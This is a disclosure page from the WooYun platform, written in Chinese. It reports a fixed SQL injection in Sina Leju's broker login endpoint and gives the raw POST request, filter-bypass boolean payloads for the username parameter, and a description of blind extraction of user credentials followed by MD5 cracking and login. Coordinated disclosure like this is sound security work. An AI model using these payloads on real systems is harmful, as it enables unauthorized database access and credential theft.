当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0191656

漏洞标题:新浪乐居之看我如何绕过过滤注入(可dump经纪人用户库)

相关厂商:新浪乐居

漏洞作者: 蓝冰

提交时间:2016-04-05 14:58

修复时间:2016-04-06 10:41

公开时间:2016-04-06 10:41

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经修复

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-04-05: 细节已通知厂商并且等待厂商处理中
2016-04-06: 厂商已经确认,细节仅向厂商公开
2016-04-06: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

rt

详细说明:

http://j.m.leju.com/login
经纪人后台登录口

POST /login/jjhcheck HTTP/1.1
Host: j.m.leju.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:44.0) Gecko/20100101 Firefox/44.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Referer: http://j.m.leju.com/login
Content-Length: 133
Cookie: PHPSESSID=idtt1n80ik24sqk8pkpdpi1ia1;
Connection: keep-alive
username=1&password=1&city=sh


username参数存在注入点
过滤的比较凶狠 = < > from || && like in等都过滤了

屏幕快照 2016-04-02 1.46.55.png


被检测到了
接着
username=1'or'1&password=1&city=sh
表示从所有用户当中找有没有密码为1的用户 结果成功了
接着找出用户密码字段

username=1' or 1 or uid and'1&password=1&city=sh
username=1' or 1 or username and'1&password=1&city=sh
username=1' or 1 or password and'1&password=1&city=sh


均返回

{"status":1,"msg":null}


字段不存在则返回

{"status":1,"msg":"\u7528\u6237\u540d\u4e0d\u5b58\u5728"}


接着确定一个uid

username=1'  or 1 and uid between 9995 and 9995 and'1&password=1&city=sh


返回正常 表示存在uid为9995的用户
接着同理注出用户名和密码

屏幕快照 2016-04-02 1.16.48.png


屏幕快照 2016-04-02 1.57.12.png


106正常107异常所以第一位ascii码为106
注出用户名后接着注出密码

屏幕快照 2016-04-02 1.58.45.png


解密md5后成功登录

屏幕快照 2016-04-02 2.00.00.png


运气不好一个空号
写个脚本轻轻松松dump所有用户

漏洞证明:

已证明

修复方案:

过滤

版权声明:转载请注明来源 蓝冰@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2016-04-06 09:15

厂商回复:

谢谢蓝冰对乐居的关注,我们会尽快修复

最新状态:

2016-04-06:已修复